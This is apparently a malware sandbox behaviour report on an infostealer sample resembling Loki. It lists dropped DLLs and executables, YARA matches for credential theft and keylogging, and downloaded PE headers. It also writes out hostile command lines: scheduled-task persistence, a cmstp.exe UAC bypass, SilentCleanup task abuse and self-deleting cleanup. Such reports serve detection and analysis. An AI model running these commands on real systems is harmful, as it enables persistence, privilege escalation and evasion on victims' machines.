file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\open.PNG.lnk
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\AccessibleMarshal.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nssckbi.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\mozMapi32.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nssdbm3.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\MapiProxy_InUse.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-string-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\dCtjCu.exe
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll
file	C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-file-l1-2-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-string-l1-1-0.dll
file	C:\ProgramData\sqlite3.dll
file	C:\Users\test22\AppData\Local\Temp\V6QfXKl0VE.exe
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-process-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\MapiProxy.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processenvironment-l1-1-0.dll
file	C:\Users\Public\nest.bat
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\IA2Marshal.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-synch-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\AccessibleHandler.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-libraryloader-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-timezone-l1-1-0.dll
file	C:\ProgramData\nss3.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-interlocked-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processthreads-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\qipcap.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\ldif60.dll
file	C:\Users\Public\KDECO.bat
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-filesystem-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-multibyte-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-profile-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\ucrtbase.dll
file	C:\Users\test22\AppData\Local\Temp\crS9EKo8sM.exe
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-runtime-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-namedpipe-l1-1-0.dll
file	C:\Users\Public\Libraries\Bdojytw\Bdojytw.exe

Creates a shortcut to an executable file (50 out of 129 events)

file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\agent.pyw.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.txt.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7\Python Manuals.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\open.PNG.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sound Recorder.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\util.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Settings.ini.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Access 2007.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\Automation Examples.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Chrome.lnk
file	C:\Users\test22\Links\Desktop.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\HttpWatch Automation Reference.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\GameExplorer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7\Module Docs.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EditPlus.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE (x86).lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip Help.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Mobility Center.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\About Java.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Get Help.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\HttpWatch Studio.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Restore.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer Reports.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Resource Monitor.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Publisher 2007.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.lnk

Creates a suspicious process (9 events)

cmdline	C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
cmdline	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\test22\AppData\Local\Temp\tmp671A.tmp"
cmdline	/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline	cmd.exe /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\499642249564258\\* & exit
cmdline	cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcv.EXE"
cmdline	schtasks.exe /Create /TN "Updates\dCtjCu" /XML "C:\Users\test22\AppData\Local\Temp\tmp671A.tmp"
cmdline	"powershell" Get-MpPreference -verbose
cmdline	"C:\Windows\System32\cmd.exe" /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\499642249564258\\* & exit

Drops a binary and executes it (7 events)

file	C:\ProgramData\GFDyrtucbvfdg.exe
file	C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe
file	C:\Users\test22\AppData\Local\Temp\zxcv.EXE
file	C:\Users\test22\AppData\Local\Temp\4tWOdlbY5p.exe
file	C:\Users\test22\AppData\Local\Temp\crS9EKo8sM.exe
file	C:\Users\test22\AppData\Local\Temp\V6QfXKl0VE.exe
file	C:\Users\test22\AppData\Local\Temp\Y9vZMbEz1g.exe

Drops an executable to the user AppData folder (50 out of 61 events)

file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-synch-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\4tWOdlbY5p.exe
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-file-l2-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-locale-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\breakpadinjector.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\prldap60.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-private-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll
file	C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-namedpipe-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-libraryloader-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-environment-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\V6QfXKl0VE.exe
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\MapiProxy.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\IA2Marshal.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-heap-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-time-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-math-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-string-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-memory-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-sysinfo-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-util-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\crS9EKo8sM.exe
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-localization-l1-2-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processthreads-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-filesystem-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-stdio-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\AccessibleHandler.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\qipcap.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-utility-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processthreads-l1-1-1.dll
file	C:\Users\test22\AppData\Local\Temp\zxcv.EXE
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-heap-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\sqlite3.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\ucrtbase.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\libEGL.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processenvironment-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-handle-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nssckbi.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-timezone-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nssdbm3.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\lgpllibs.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-synch-l1-2-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-conio-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-file-l1-2-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\ldap60.dll
file	C:\Users\test22\AppData\Local\Temp\Y9vZMbEz1g.exe

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 2364)

A process created a hidden window (11 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Aug. 9, 2021, 9:27 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\4tWOdlbY5p.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\4tWOdlbY5p.exe	1	1
ShellExecuteExW Aug. 9, 2021, 9:27 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\j6VXXENS27.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\j6VXXENS27.exe	1	1
ShellExecuteExW Aug. 9, 2021, 9:27 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\crS9EKo8sM.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\crS9EKo8sM.exe	1	1
ShellExecuteExW Aug. 9, 2021, 9:27 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\V6QfXKl0VE.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\V6QfXKl0VE.exe	1	1
ShellExecuteExW Aug. 9, 2021, 9:27 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\Y9vZMbEz1g.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\Y9vZMbEz1g.exe	1	1
CreateProcessInternalW Aug. 9, 2021, 9:27 a.m.	thread_identifier: 1928 thread_handle: 0x0000078c process_identifier: 2440 current_directory: filepath: track: 1 command_line: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcv.EXE" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000788	1	1
ShellExecuteExW Aug. 9, 2021, 9:26 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\499642249564258\\* & exit filepath: cmd.exe	1	1
ShellExecuteExW Aug. 9, 2021, 9:41 a.m.	show_type: 0 filepath_r: schtasks.exe parameters: /Create /TN "Updates\dCtjCu" /XML "C:\Users\test22\AppData\Local\Temp\tmp671A.tmp" filepath: schtasks.exe	1	1
CreateProcessInternalW Aug. 9, 2021, 9:41 a.m.	thread_identifier: 3408 thread_handle: 0x000000ac process_identifier: 3404 current_directory: filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000b0	1	1
CreateProcessInternalW Aug. 9, 2021, 9:41 a.m.	thread_identifier: 3128 thread_handle: 0x00000218 process_identifier: 3112 current_directory: C:\Users\test22\AppData\LocalLow filepath: track: 1 command_line: "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\b3hfotbm.inf filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000021c	1	1
CreateProcessInternalW Aug. 9, 2021, 9:41 a.m.	thread_identifier: 3156 thread_handle: 0x0000020c process_identifier: 3088 current_directory: C:\Users\test22\AppData\LocalLow filepath: track: 1 command_line: "powershell" Get-MpPreference -verbose filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000218	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 9, 2021, 9:26 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 24576 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x005a0000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 9, 2021, 9:26 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process dsfnbyhgfrtydfg.exe (7 events)

Time & API	Arguments	Status	Return
InternetReadFile Aug. 9, 2021, 9:26 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $¢l$æ JOæ JOæ JOïuÙOê JO?oKNä JO?oINä JO?oONì JO?oNNí JOÄmKNä JO-nKNå JOæ KO~ JO-nNNò JO-nJNç JO-nµOç JO-nHNç JORichæ JOPEL¿bë[à"!¶b¼ÐP ±@¨¸È0xÐ@`ÐþT(ÿ@Ðl.textË´¶ `.rdata DÐFº@@.data @À.rsrcx0@@.reloc`@@B request_handle: 0x00cc000c	1	1
InternetReadFile Aug. 9, 2021, 9:26 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELê=Sv?à!ÐàXà` 8Ã °ÐL ü'ð¬Ñp.textÀÎÐ`0`.data°àÖ@@À.rdata$ð®æ@@@.bss @À.edata°@0@.idataL Ð®@0À.CRTàº@0À.tls ð¼@0À.relocü'(¾@0B/4`0æ@@B/19È@è@B/35MPì@B/51`C`Dô@B/63 °8@B/77ÀF@B/89ÐR request_handle: 0x00cc000c	1	1
InternetReadFile Aug. 9, 2021, 9:26 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Àð/AVAVAVéÒVAV]ó@WAV1VAV]óBWAV]óDWAV]óEWAV¦ñ@WAVOò@WAV@VÖAVOòBWAVOòEWÀAVOòAWAVOò¾VAVOòCWAVRichAVPELØbë[à"!Øf)Ýðp£s@pæPÀæÈ@xüÐPà0âTâ@ð8.texttÖØ `.rdataüþðÜ@@.data,HðÜ@À.rsrcx@à@@.relocàPä@B request_handle: 0x00cc000c	1	1
InternetReadFile Aug. 9, 2021, 9:26 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÂU±É£;âÉ£;âÉ£;âÀÛ¨âÙ£;âWüâË£;âÁ8ãÇ£;âÁ?ãÂ£;âÁ:ãÍ£;âÁ>ãÛ£;âëÃ:ãÀ£;âÉ£:âw£;âÀ?ãÈ£;âÀ>ãÝ£;âÀ;ãÈ£;âÀÄâÈ£;âÀ9ãÈ£;âRichÉ£;âPELÄ_ë[à"!zà@3@A@Àt´Þ, xúÐ0h¹TT¹h¸@ôl¾.textÊxz `.rdata^ef~@@.data¼ä@À.didat8æ@À.rsrcx è@@.reloch0ì@B request_handle: 0x00cc000c	1	1
InternetReadFile Aug. 9, 2021, 9:26 a.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $¦È¼Aâ©Òâ©Òâ©ÒV5=à©ÒëÑAú©Ò;ËÓá©Òâ©Ó"©Ò;ËÑë©Ò;ËÖî©Ò;Ë×ô©Ò;ËÚ©Ò;ËÒã©Ò;Ë-ã©Ò;ËÐã©ÒRichâ©ÒPEL8'Yà"!P± Ðaz@AðCÏôR,øx8?4:ðf8È(@Pð@@.textr `.data( @À.idata6P @@.didat4p6@À.rsrcø8@@.reloc4:<<@B request_handle: 0x00cc000c	1	1
InternetReadFile Aug. 9, 2021, 9:26 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $#4gâZßgâZßgâZßnÉßsâZß¾[ÞeâZßùBßcâZß¾YÞjâZß¾_ÞmâZß¾^ÞlâZßE[ÞoâZß¬[ÞdâZßgâ[ßâZß¬^ÞmãZß¬ZÞfâZß¬¥ßfâZß¬XÞfâZßRichgâZßPELbë[à"!êwð@·»@ =T°pæÐÀ}pTÈ@ø.textèê `.rdataRTî@@.datatG`"B@À.rsrcp°d@@.reloc}À~h@B request_handle: 0x00cc000c	1	1
InternetReadFile Aug. 9, 2021, 9:26 a.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $ù£NEÍEÍEÍñ"GÍLà^NÍEÌlÍúÉUÍúÎVÍúÈAÍúÅ_ÍúÍDÍú2DÍúÏDÍRichEÍPEL8'Yà"!ê ® @¼@A°ð À H?0 °8è@¼.textÄéê `.dataDî@À.idata¸ð@@.rsrc ö@@.reloc 0ü@B request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x000f5000', u'virtual_address': u'0x00001000', u'entropy': 7.767190054149037, u'name': u'.text', u'virtual_size': u'0x000f420c'}

entropy

7.76719005415

description

A section with a high entropy has been found

entropy

0.991902834008

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Aug. 9, 2021, 9:26 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 9, 2021, 9:41 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 9, 2021, 9:41 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 9, 2021, 9:41 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Potentially malicious URLs were found in the process memory dump (2 events)

url	http://ip-api.com/json
url	https://dotbit.me/a/

Yara rule detected in process memory (50 out of 126 events)

description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Win32 PWS Loki	rule	Win32_PWS_Loki_Zero
description	Run a KeyLogger	rule	KeyLogger
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader

Queries for potentially installed applications (50 out of 79 events)

Time & API	Arguments	Status	Return
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000005f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1	0
